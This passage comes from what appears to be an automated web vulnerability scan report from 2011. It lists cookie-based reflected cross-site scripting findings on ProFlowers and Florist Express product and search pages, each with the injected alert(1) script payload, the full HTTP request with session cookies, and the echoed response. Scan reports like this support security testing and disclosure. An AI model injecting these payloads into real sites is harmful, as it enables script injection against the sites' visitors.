resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84fd481f</script><script>alert(1)</script>4377d2f310b";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv
...[SNIP]...

2.121. http://products.proflowers.com/roses/Two-Dozen-Long-Stemmed-Red-Roses-504 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /roses/Two-Dozen-Long-Stemmed-Red-Roses-504

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 249f3</script><script>alert(1)</script>731f6b5159e was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /roses/Two-Dozen-Long-Stemmed-Red-Roses-504 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f249f3</script><script>alert(1)</script>731f6b5159e; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?504&2/11/2011 2:35:47 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:35:47 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:35:47 GMT
Connection: close
Content-Length: 158411


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
ct";
resx.links="504;30007219;30050091;40753;42211;30004718;30050119;";
resx.itemid = "504";
resx.qty="1";
resx.price="99.97";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f249f3</script><script>alert(1)</script>731f6b5159e";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv
...[SNIP]...

2.122. http://products.proflowers.com/tulips/20-Rainbow-Valentines-Tulips-426 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /tulips/20-Rainbow-Valentines-Tulips-426

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 619cf</script><script>alert(1)</script>3a90e1866c4 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /tulips/20-Rainbow-Valentines-Tulips-426 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f619cf</script><script>alert(1)</script>3a90e1866c4; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?426&2/11/2011 2:35:03 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:35:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:35:02 GMT
Connection: close
Content-Length: 157772


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
sx.event="Product";
resx.links="426;3669;30007691;3669;5395;30050119;";
resx.itemid = "426";
resx.qty="1";
resx.price="24.98";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f619cf</script><script>alert(1)</script>3a90e1866c4";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv
...[SNIP]...

2.123. http://products.proflowers.com/tulips/20-Sweetheart-Tulips-2744 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /tulips/20-Sweetheart-Tulips-2744

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8ee6</script><script>alert(1)</script>03259a5beb5 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /tulips/20-Sweetheart-Tulips-2744 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84fa8ee6</script><script>alert(1)</script>03259a5beb5; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?2744&2/11/2011 2:36:50 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:36:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:36:50 GMT
Connection: close
Content-Length: 155088


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
.event="Product";
resx.links="2744;30007493;41213;30043943;30050119;";
resx.itemid = "2744";
resx.qty="1";
resx.price="19.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84fa8ee6</script><script>alert(1)</script>03259a5beb5";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv
...[SNIP]...

2.124. http://www.floristexpress.net/ [ref_code cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /

Issue detail

The value of the ref_code cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b92ec"%3balert(1)//fcbdf6b6cb5 was submitted in the ref_code cookie. This input was echoed as b92ec";alert(1)//fcbdf6b6cb5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.floristexpress.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; PHPSESSID=27a683a410672ee44f267ad919db2594; ARPT=IZJPJPS192.168.100.163CKOWO; ref_code=b92ec"%3balert(1)//fcbdf6b6cb5;

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:48:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=d33655c5e56ac1139ebc9ff939004443; path=/
Connection: close
Content-Type: text/html
Content-Length: 103496

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
";
s.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="1:30PM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="A";
s.eVar36="b92ec";alert(1)//fcbdf6b6cb5";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2.125. http://www.floristexpress.net/ [ref_code cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /

Issue detail

The value of the ref_code cookie is copied into a JavaScript rest-of-line comment. The payload abe49%0aalert(1)//1152c45c4d5 was submitted in the ref_code cookie. This input was echoed as abe49
alert(1)//1152c45c4d5
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.floristexpress.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; PHPSESSID=27a683a410672ee44f267ad919db2594; ARPT=IZJPJPS192.168.100.163CKOWO; ref_code=ORDB295E%22%3BALERT%281%29%2F%2FB7F69AE6950abe49%0aalert(1)//1152c45c4d5;

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:48:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=a96375ccee03b7060086e4761bd98a01; path=/
Connection: close
Content-Type: text/html
Content-Length: 103526

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
Var14="";
s.eVar18="";
s.eVar22="1:30PM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="B";
s.eVar36="ORDB295E";ALERT(1)//B7F69AE6950abe49
alert(1)//1152c45c4d5
";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2.126. http://www.floristexpress.net/comeback.htm [ref_code cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /comeback.htm

Issue detail

The value of the ref_code cookie is copied into a JavaScript rest-of-line comment. The payload 887eb%0aalert(1)//a43d5f34193 was submitted in the ref_code cookie. This input was echoed as 887eb
alert(1)//a43d5f34193
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /comeback.htm HTTP/1.1
Host: www.floristexpress.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; PHPSESSID=27a683a410672ee44f267ad919db2594; ARPT=IZJPJPS192.168.100.163CKOWO; ref_code=ORDB295E%22%3BALERT%281%29%2F%2FB7F69AE6950887eb%0aalert(1)//a43d5f34193;

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:48:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=422fee3e25aa7a57b98ec7e306cf877f; path=/
Connection: close
Content-Type: text/html
Content-Length: 103526

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
Var14="";
s.eVar18="";
s.eVar22="1:30PM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="C";
s.eVar36="ORDB295E";ALERT(1)//B7F69AE6950887eb
alert(1)//a43d5f34193
";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2.127. http://www.floristexpress.net/comeback.htm [ref_code cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /comeback.htm

Issue detail

The value of the ref_code cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16594"%3balert(1)//c41372478c8 was submitted in the ref_code cookie. This input was echoed as 16594";alert(1)//c41372478c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /comeback.htm HTTP/1.1
Host: www.floristexpress.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; PHPSESSID=27a683a410672ee44f267ad919db2594; ARPT=IZJPJPS192.168.100.163CKOWO; ref_code=16594"%3balert(1)//c41372478c8;

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:48:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=adac7f85c4277d271fcc88a8141c69da; path=/
Connection: close
Content-Type: text/html
Content-Length: 103496

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
";
s.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="1:30PM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="A";
s.eVar36="16594";alert(1)//c41372478c8";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2.128. http://www.floristexpress.net/products/tulip_rainbow.htm [ref_code cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /products/tulip_rainbow.htm

Issue detail

The value of the ref_code cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8173"%3balert(1)//95ac6cbaf33c38076 was submitted in the ref_code cookie. This input was echoed as e8173";alert(1)//95ac6cbaf33c38076 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/tulip_rainbow.htm?order_prod_num=FYF-MIXTUL&order_prod_size=r&order_upgrds%5Bm%5D%5Bqty%5D=&order_upgrds%5Bm%5D%5Bopt%5D=&order_upgrds%5Bl%5D%5Bqty%5D=&order_upgrds%5Bl%5D%5Bopt%5D=&order_upgrds%5Bc%5D%5Bopt%5D=&order_upgrds%5Bt%5D%5Bopt%5D=&order_d_card_type=Blank+Card&order_d_recip=&remLen=175&order_d_card_msg=&remChars=175&order_d_card_sig=&order_d_zip=&continue.x=66&continue.y=20 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://www.floristexpress.net/products/tulip_rainbow.htm
Cache-Control: max-age=0
Origin: http://www.floristexpress.net
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=IZJPJPS192.168.100.70CKOMM; PHPSESSID=be5eceddad9804e3c8f89291e0dce73f; ref_code=ORDe8173"%3balert(1)//95ac6cbaf33c38076; s_cc=true; s_sq=proflodevelopment%3D%2526pid%253Dfle%25253Aproduct%25253AFYF-MIXTUL%2526pidt%253D1%2526oid%253Dhttp%25253A//a121.g.akamai.net/f/121/21164/1d/content.floristexpress.net/images/btn_buynow.jpg%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 18:55:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c2d443072044e030c1ee1ec63640d40a; path=/
Content-Type: text/html
Content-Length: 32960

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Tulip Rainbow at FloristExpress.Net<
...[SNIP]...
.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="10:30AM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="D";
s.eVar36="ORDe8173";alert(1)//95ac6cbaf33c38076";
s.eVar40="";
s.eVar47="";

s.products=";FYF-MIXTUL;;;event5=1;";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2.129. http://www.floristexpress.net/search.htm [ref_code cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /search.htm

Issue detail

The value of the ref_code cookie is copied into a JavaScript rest-of-line comment. The payload 9cce6%0aalert(1)//a6ee837bd09 was submitted in the ref_code cookie. This input was echoed as 9cce6
alert(1)//a6ee837bd09
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /search.htm HTTP/1.1
Host: www.floristexpress.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; PHPSESSID=27a683a410672ee44f267ad919db2594; ARPT=IZJPJPS192.168.100.163CKOWO; ref_code=ORDB295E%22%3BALERT%281%29%2F%2FB7F69AE69509cce6%0aalert(1)//a6ee837bd09;

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:48:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fae449980e73edd6ddf586df6ebc10c1; path=/
Connection: close
Content-Type: text/html
Content-Length: 103526

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
Var14="";
s.eVar18="";
s.eVar22="1:30PM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="A";
s.eVar36="ORDB295E";ALERT(1)//B7F69AE69509cce6
alert(1)//a6ee837bd09
";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2.130. http://www.floristexpress.net/search.htm [ref_code cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /search.htm

Issue detail

The value of the ref_code cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8c9c"%3balert(1)//fc46026c459 was submitted in the ref_code cookie. This input was echoed as f8c9c";alert(1)//fc46026c459 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /search.htm HTTP/1.1
Host: www.floristexpress.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; PHPSESSID=27a683a410672ee44f267ad919db2594; ARPT=IZJPJPS192.168.100.163CKOWO; ref_code=f8c9c"%3balert(1)//fc46026c459;

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 11 Feb 2011 21:48:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=014025ff7bd7b3bdb7c6e1f747abe972; path=/
Connection: close
Content-Type: text/html
Content-Length: 103496

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
";
s.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="1:30PM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="D";
s.eVar36="f8c9c";alert(1)//fc46026c459";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...
